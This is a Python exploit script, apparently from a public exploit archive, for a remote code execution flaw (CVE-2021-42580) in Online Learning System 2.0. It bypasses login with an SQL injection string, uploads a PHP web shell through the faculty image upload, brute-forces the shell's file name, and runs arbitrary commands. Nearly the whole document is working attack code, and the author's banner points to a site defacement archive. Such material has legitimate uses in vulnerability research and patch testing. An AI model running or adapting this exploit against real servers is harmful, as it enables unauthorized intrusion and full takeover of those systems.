Online Learning System 2.0 Remote Code Execution

`# Exploit Title: Online Learning System 2.0 - Remote Code Execution (RCE)  
# Date: 15/11/2021  
# Exploit Author: djebbaranon  
# Vendor Homepage: https://github.com/oretnom23  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/elearning_v2_0.zip  
# Version: 2.0  
# Tested on: Kali linux / Windows 10  
# CVE : CVE-2021-42580  
  
#!/usr/bin/python3  
import os  
import time  
import argparse  
import requests  
import sys  
from colorama import init  
from colorama import Fore  
from colorama import Back  
from colorama import Style  
init(autoreset=True)  
def banner():  
print('''  
  
_____ _ _ _ _ _____ ______ _____ _____   
| _ | | (_) | | (_) / __ \ | ___ / __ | ___|  
| | | |_ __ | |_ _ __ ___ | | ___ __ _ _ __ _ __ _ _ __ __ _ __ _`' / /' | |_/ | / \| |__   
| | | | '_ \| | | '_ \ / _ \ | |/ _ \/ _` | '__| '_ \| | '_ \ / _` | \ \ / / / / | /| | | __|   
\ \_/ | | | | | | | | | __/ | | __| (_| | | | | | | | | | | (_| | \ V /./ /___ | |\ \| \__/| |___   
\___/|_| |_|_|_|_| |_|\___| |_|\___|\__,_|_| |_| |_|_|_| |_|\__, | \_/ \_____/ \_| \_|\____\____/   
__/ |   
|___/   
Written by djebbaranon   
twitter : @dj3bb4ran0n1  
zone-h : http://zone-h.org/archive/notifier=djebbaranon  
''')  
banner()  
def my_args():  
parser = argparse.ArgumentParser(epilog="Example : python3 -u http://localhost/elearning -r 1000 -c whoami")  
parser.add_argument("-u","--url",type=str,required=True,help="url of target")  
parser.add_argument("-r","--range",type=int,required=True,help="range for bruteforce the webshell name")  
parser.add_argument("-c","--command",type=str,required=True,help="command to execute")  
my_arguments = parser.parse_args()  
return my_arguments  
def login_with_sqli_login_bypass(user,passw):  
global session  
global url  
global cookies  
url = my_args().url  
session = requests.Session()  
data = {  
"username" : user,  
"password" : passw,  
}  
try:  
response = session.post(url + "/classes/Login.php?f=login",data=data,verify=False)  
print( Fore.GREEN + "[+] Logged in succsusfully")  
cookies = response.cookies.get_dict()  
print("[+] your cookie : ")  
except requests.HTTPError as exception:  
print(Fore.RED + "[-] HTTP Error : {}".format(exception))  
sys.exit(1)  
login_with_sqli_login_bypass("' or 1=1 -- -","' or 1=1 -- -")  
def main(shell_name,renamed_shell):  
try:  
payload ={  
"id" : "",  
"faculty_id" : "test",  
"firstname" : "test",  
"lastname" : "test",  
"middlename" : "fsdfsd",  
"dob" : "2021-10-29",  
"gender": "Male",  
"department_id" : "1",  
"email" : "[email protected]",  
"contact" : "zebii",  
"address" : "zebii",   
}  
files = {  
"img" :  
(  
shell_name,  
"<?php echo \"<pre><h1>nikmok</h1>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"?>",  
"application/octet-stream",  
)  
}  
vunlerable_file = "/classes/Master.php?f=save_faculty"  
print("[*] Trying to upload webshell ....")  
response_2 = session.post(url + vunlerable_file,data=payload,cookies=cookies,files=files)  
print("[+] trying to bruteforce the webshell ....")  
rangee = my_args().range  
for i in range(0,rangee):  
try:  
with requests.get(url + "/uploads/Favatar_" + str(i) + ".php?cmd=whoami",allow_redirects=False) as response3:  
if "nikmok" in response3.text and response3.status_code == 200:  
print("\n" + Fore.GREEN + "[+] shell found : " + response3.url +"\n")  
break  
with open("shell.txt",mode="w+") as writer:  
writer.write(response3.url)  
else:  
print( Fore.RED + "[-] shell not found : " + response3.url)  
except requests.HTTPError as exception2:  
print("[-] HTTP Error : {0} ".format(exception2))  
except requests.HTTPError as error:  
print("[-] HTTP Error : ".format(error))  
command = my_args().command  
with requests.get(response3.url.replace("whoami",command)) as response4:  
print("[*] Executing {} ....".format(command))  
time.sleep(3)  
print("\n" + Style.BRIGHT + Fore.GREEN + response4.text)  
main("hackerman.php","")  
  
`